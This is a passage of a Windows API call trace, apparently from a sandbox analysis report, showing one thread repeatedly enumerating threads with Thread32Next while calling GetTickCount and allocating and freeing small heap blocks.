Flags=0x0, Size=0x64) returned 0x673558 [0191.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.487] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.489] GetTickCount () returned 0xf5a5 [0191.489] GetCurrentThreadId () returned 0x66c [0191.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.489] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.491] GetTickCount () returned 0xf5a5 [0191.491] GetCurrentThreadId () returned 0x66c [0191.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.491] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.492] GetTickCount () returned 0xf5a5 [0191.492] GetCurrentThreadId () returned 0x66c [0191.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.493] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.494] GetTickCount () returned 0xf5a5 [0191.494] GetCurrentThreadId () returned 0x66c [0191.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.495] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.496] GetTickCount () returned 0xf5a5 [0191.496] GetCurrentThreadId () returned 0x66c [0191.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.496] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.498] GetTickCount () returned 0xf5a5 [0191.498] GetCurrentThreadId () returned 0x66c [0191.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.498] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.500] GetTickCount () returned 0xf5a5 [0191.500] GetCurrentThreadId () returned 0x66c [0191.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.500] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.503] GetTickCount () returned 0xf5b5 [0191.503] GetCurrentThreadId () returned 0x66c [0191.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.504] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.506] GetTickCount () returned 0xf5b5 [0191.506] GetCurrentThreadId () returned 0x66c [0191.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.507] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.508] GetTickCount () returned 0xf5b5 [0191.508] GetCurrentThreadId () returned 0x66c [0191.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.509] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.510] GetTickCount () returned 0xf5b5 [0191.510] GetCurrentThreadId () returned 0x66c [0191.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.511] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.512] GetTickCount () returned 0xf5b5 [0191.512] GetCurrentThreadId () returned 0x66c [0191.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.513] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.514] GetTickCount () returned 0xf5b5 [0191.514] GetCurrentThreadId () returned 0x66c [0191.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.514] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.516] GetTickCount () returned 0xf5b5 [0191.516] GetCurrentThreadId () returned 0x66c [0191.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.516] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.517] GetTickCount () returned 0xf5b5 [0191.517] GetCurrentThreadId () returned 0x66c [0191.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.518] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.519] GetTickCount () returned 0xf5c4 [0191.519] GetCurrentThreadId () returned 0x66c [0191.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.520] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.521] GetTickCount () returned 0xf5c4 [0191.521] GetCurrentThreadId () returned 0x66c [0191.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.521] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.522] GetTickCount () returned 0xf5c4 [0191.522] GetCurrentThreadId () returned 0x66c [0191.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.523] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.524] GetTickCount () returned 0xf5c4 [0191.524] GetCurrentThreadId () returned 0x66c [0191.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.524] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.526] GetTickCount () returned 0xf5c4 [0191.526] GetCurrentThreadId () returned 0x66c [0191.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.526] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.527] GetTickCount () returned 0xf5c4 [0191.528] GetCurrentThreadId () returned 0x66c [0191.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.528] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.529] GetTickCount () returned 0xf5c4 [0191.529] GetCurrentThreadId () returned 0x66c [0191.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.530] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.531] GetTickCount () returned 0xf5c4 [0191.531] GetCurrentThreadId () returned 0x66c [0191.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.532] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.533] GetTickCount () returned 0xf5c4 [0191.533] GetCurrentThreadId () returned 0x66c [0191.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.534] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.535] GetTickCount () returned 0xf5d4 [0191.535] GetCurrentThreadId () returned 0x66c [0191.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.535] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.537] GetTickCount () returned 0xf5d4 [0191.537] GetCurrentThreadId () returned 0x66c [0191.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.537] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.538] GetTickCount () returned 0xf5d4 [0191.538] GetCurrentThreadId () returned 0x66c [0191.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.539] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.540] GetTickCount () returned 0xf5d4 [0191.540] GetCurrentThreadId () returned 0x66c [0191.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.540] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.541] GetTickCount () returned 0xf5d4 [0191.541] GetCurrentThreadId () returned 0x66c [0191.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.542] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.543] GetTickCount () returned 0xf5d4 [0191.543] GetCurrentThreadId () returned 0x66c [0191.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.543] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.545] GetTickCount () returned 0xf5d4 [0191.545] GetCurrentThreadId () returned 0x66c [0191.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.545] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.547] GetTickCount () returned 0xf5d4 [0191.547] GetCurrentThreadId () returned 0x66c [0191.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.547] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.549] GetTickCount () returned 0xf5d4 [0191.549] GetCurrentThreadId () returned 0x66c [0191.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.549] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.550] GetTickCount () returned 0xf5e4 [0191.550] GetCurrentThreadId () returned 0x66c [0191.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.551] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.552] GetTickCount () returned 0xf5e4 [0191.552] GetCurrentThreadId () returned 0x66c [0191.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.552] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.553] GetTickCount () returned 0xf5e4 [0191.554] GetCurrentThreadId () returned 0x66c [0191.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.554] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.555] GetTickCount () returned 0xf5e4 [0191.555] GetCurrentThreadId () returned 0x66c [0191.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.556] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.557] GetTickCount () returned 0xf5e4 [0191.557] GetCurrentThreadId () returned 0x66c [0191.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.557] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.559] GetTickCount () returned 0xf5e4 [0191.559] GetCurrentThreadId () returned 0x66c [0191.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.559] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.560] GetTickCount () returned 0xf5e4 [0191.560] GetCurrentThreadId () returned 0x66c [0191.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.561] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.562] GetTickCount () returned 0xf5e4 [0191.562] GetCurrentThreadId () returned 0x66c [0191.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.562] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.563] GetTickCount () returned 0xf5e4 [0191.564] GetCurrentThreadId () returned 0x66c [0191.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.564] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.566] GetTickCount () returned 0xf5f3 [0191.566] GetCurrentThreadId () returned 0x66c [0191.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.566] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.567] GetTickCount () returned 0xf5f3 [0191.567] GetCurrentThreadId () returned 0x66c [0191.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.568] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.569] GetTickCount () returned 0xf5f3 [0191.569] GetCurrentThreadId () returned 0x66c [0191.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.569] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.571] GetTickCount () returned 0xf5f3 [0191.571] GetCurrentThreadId () returned 0x66c [0191.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.571] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.572] GetTickCount () returned 0xf5f3 [0191.572] GetCurrentThreadId () returned 0x66c [0191.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.573] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.574] GetTickCount () returned 0xf5f3 [0191.574] GetCurrentThreadId () returned 0x66c [0191.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.574] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.576] GetTickCount () returned 0xf5f3 [0191.576] GetCurrentThreadId () returned 0x66c [0191.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.576] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.578] GetTickCount () returned 0xf5f3 [0191.578] GetCurrentThreadId () returned 0x66c [0191.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.579] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.580] GetTickCount () returned 0xf603 [0191.580] GetCurrentThreadId () returned 0x66c [0191.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.580] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.582] GetTickCount () returned 0xf603 [0191.582] GetCurrentThreadId () returned 0x66c [0191.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.582] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.583] GetTickCount () returned 0xf603 [0191.583] GetCurrentThreadId () returned 0x66c [0191.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.584] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.585] GetTickCount () returned 0xf603 [0191.585] GetCurrentThreadId () returned 0x66c [0191.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.585] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.587] GetTickCount () returned 0xf603 [0191.587] GetCurrentThreadId () returned 0x66c [0191.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.587] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.588] GetTickCount () returned 0xf603 [0191.588] GetCurrentThreadId () returned 0x66c [0191.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.589] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.590] GetTickCount () returned 0xf603 [0191.590] GetCurrentThreadId () returned 0x66c [0191.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.591] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.592] GetTickCount () returned 0xf603 [0191.592] GetCurrentThreadId () returned 0x66c [0191.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.593] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.594] GetTickCount () returned 0xf603 [0191.594] GetCurrentThreadId () returned 0x66c [0191.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.595] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.597] GetTickCount () returned 0xf612 [0191.597] GetCurrentThreadId () returned 0x66c [0191.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.597] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.598] GetTickCount () returned 0xf612 [0191.598] GetCurrentThreadId () returned 0x66c [0191.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.599] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.600] GetTickCount () returned 0xf612 [0191.600] GetCurrentThreadId () returned 0x66c [0191.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.600] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.601] GetTickCount () returned 0xf612 [0191.601] GetCurrentThreadId () returned 0x66c [0191.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.602] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.603] GetTickCount () returned 0xf612 [0191.603] GetCurrentThreadId () returned 0x66c [0191.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.604] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.605] GetTickCount () returned 0xf612 [0191.605] GetCurrentThreadId () returned 0x66c [0191.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.606] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.607] GetTickCount () returned 0xf612 [0191.607] GetCurrentThreadId () returned 0x66c [0191.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.608] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.609] GetTickCount () returned 0xf612 [0191.609] GetCurrentThreadId () returned 0x66c [0191.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.609] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.611] GetTickCount () returned 0xf612 [0191.611] GetCurrentThreadId () returned 0x66c [0191.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.611] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.612] GetTickCount () returned 0xf622 [0191.612] GetCurrentThreadId () returned 0x66c [0191.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.613] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.614] GetTickCount () returned 0xf622 [0191.614] GetCurrentThreadId () returned 0x66c [0191.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.614] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.615] GetTickCount () returned 0xf622 [0191.615] GetCurrentThreadId () returned 0x66c [0191.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.616] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.617] GetTickCount () returned 0xf622 [0191.617] GetCurrentThreadId () returned 0x66c [0191.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.617] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.619] GetTickCount () returned 0xf622 [0191.619] GetCurrentThreadId () returned 0x66c [0191.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.619] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.620] GetTickCount () returned 0xf622 [0191.620] GetCurrentThreadId () returned 0x66c [0191.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.621] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.622] GetTickCount () returned 0xf622 [0191.622] GetCurrentThreadId () returned 0x66c [0191.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.623] HeapFree (in: hHeap=0x620000, 